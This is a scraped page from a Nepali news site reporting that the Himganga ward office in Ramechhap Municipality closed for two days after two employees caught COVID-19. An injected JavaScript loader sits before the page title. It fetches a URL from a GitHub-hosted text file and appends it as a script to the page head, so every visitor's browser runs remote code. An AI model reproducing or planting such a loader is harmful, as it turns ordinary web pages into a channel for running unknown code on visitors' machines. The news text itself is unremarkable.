;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); हिमगंगा वडा कार्यालय २ दिनको लागि बन्द – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • हिमगंगा वडा कार्यालय २ दिनको लागि बन्द
रामेछाप बिशेष

हिमगंगा वडा कार्यालय २ दिनको लागि बन्द

कात्तिक २७,
रामेछाप ।  रामेछाप जिल्लाको, रामेछाप नगरपालिका वडा नं-४ हिमगंगा  २ दिनको लागि बन्द भएको छ ।
नगरपालिकामा कार्यरत २ जना कर्मचारीमा कोरोना  भाइरस संक्रमण देखिएकाले बुधबारदेखि शुक्रबारसम्मको लागि वडा कार्यलय बन्द भएको नगरपालिकाले एक सूचना मार्फत् जानकारी दिएको छ ।बुधबार त्यहाँ कार्यररत २ जना पुरुष कार्मचारीलाई संक्रमण देखिएको थियो । त्यस्तै १ जना कर्मचारीमा संक्रमणको आशंका गरिएकाले  लगत्तै  वडा कार्यालय बन्द रहने सूचना मार्फत् जानकारी गराईएको छ ।

सूचना हेर्नुहोस्

फेसबुक प्रतिक्रियाहरु